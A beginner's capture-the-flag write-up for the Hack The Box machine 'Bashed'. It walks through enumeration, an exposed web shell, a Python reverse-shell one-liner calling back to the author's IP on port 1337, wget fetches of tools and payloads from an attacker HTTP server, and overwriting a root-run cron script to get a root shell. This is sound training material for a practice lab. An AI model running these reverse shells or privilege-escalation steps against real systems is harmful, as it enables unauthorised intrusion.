Hey, this is my first time making a write-up for a hackthebox machine. I know this is a relatively old box but I’m doing this for practice. Bashed is an easy box to own, but beginners may struggle a bit like myself so I’ll try to explain everything as much as possible. Anyway, lets get started.
-
First off we will run an nmap scan to check for any open ports.
nmap -sC -sV -v -oA nmapScan 10.10.10.68-sC: Default nmap scan
-sV: Scan open ports to detect services running and their versions
-v: verbose mode allows us to see open ports as they are found
-o output the results to a file named “nmapScan”If you get an error, try running with the -Pn flag like it says in the message
nmap -sC -sV -Pn -v -oA nmapScan 10.10.10.68The output:
We see only one port open, which is port 80.
-
So let’s go check it out. Port 80 is the TCP port used by HTTP requests. The fact that it’s open means there is a website we can visit.
Doesn’t look like there’s much here. Let’s move on.
-
Next we will run a gobuster scan to enumerate any hidden pages on the website.
gobuster dir -u 10.10.10.68 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.t
xt -t 30 -o gbscandir: directory bruteforce mode
-u: the url / ip address to scan
-w: the wordlist used to bruteforce dirs. I almost always use the 2.3-medium list first
-t: number of concurrent threads allocated to the scan
-o: save the output to a fileOnce the scan is complete we see the following:
Lets check out some of these pages that gobuster found.
-
Looking at 10.10.10.68/dev we see this:
The bottom link takes us to an interactive web shell. Which is pretty convenient.
We see that we are logged in as “www-data”. From here we can grab the user flag.
cat /home/arrexel/user.txtto view the user flag.
-
Sick, now lets move on to the root flag. On the web shell it seems like each time you submit a command it creates a new shell with at most the www-data privileges. So in order to get around this were gonna need to create a reverse shell back to our own system. First off lets take a look at pen test monkey and find a suitable reverse shell.
If we check on the box, we can see that python is installed:
This means that one option we have for reverse shells would be python. Go ahead and grab this one:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.58",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Making sure to edit the ip address to your local ip, and the port to the port you will setup a listener on.
In my case my ip is:
10.10.14.58
And the port I’ll use is:1337
If you don’t know what your ip is, typesudo ifconfig tun0Before pasting the reverse shell into the web shell, we need to setup the listener. So type:
sudo nc -lvnp 1337
Now go ahead and paste the python code in and hit enter. -
Word, we got a shell back. But this shell sucks so let’s spruce it up with this:
python -c 'import pty;pty.spawn("/bin/bash")'Now it should look something like this:
This is ok, but we can do better. We want to be able to use tab complete and arrow keys. To do this follow these steps:
1) press: ctrl-z ;Send to background
2) type: stty raw -echo
3) type: fg then press enter
4) press enter again -
Now the shell is lookin and feelin fresh, so we can move on. On the box we see that besides user arrexel, there is a user named scriptmanager. We will use this. One way you could have found that this user is exploitable is to upload LinEnum.sh and run that.
If you are interested in how you go about doing this, you can download LinEnum from here Then cd to /dev/shm on the target machine.
On your machine copy the LinEnum.sh file to your current directory and setup a python simple server with this:
sudo python -m SimpleHTTPServer 80On the target machine type:
wget http://your-ip/LinEnum.sh
Making sure to replace “your-ip” with your actual ip addressShould look like this if successful:
Then run the file with
bash LinEnum.sh -
Alright, now we got that out of the way, lets jump into the scriptmanager user.
sudo -u scriptmanager bash
Cool. Once in scriptmanager we see that we can access a folder appropriately called “Scripts”. Inside there are two files, one called test.py and another called test.txt. The test.py script is run every few minutes and it reads the test.txt file which has root priv. We can create a different python file to be called that will give us a root shell.
Ok so I might as well just reuse the reverse shell script we used earlier and put it in a python file. To do that type this on the target machine:
echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.58\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > .lmaooo.pyOk so that didn’t work for some reason. I’m just going to copy it to a python file on my machine then wget it to the target box. This time I’ll name the file test.py.
Then using the
python -m SimpleHTTPServeragain
we canwget http://10.10.14.58/test.pyAnd after setting up a netcat listener we get a root shell
Success!
Thanks for reading. Planning on posting more of this type of content in the future.
-K
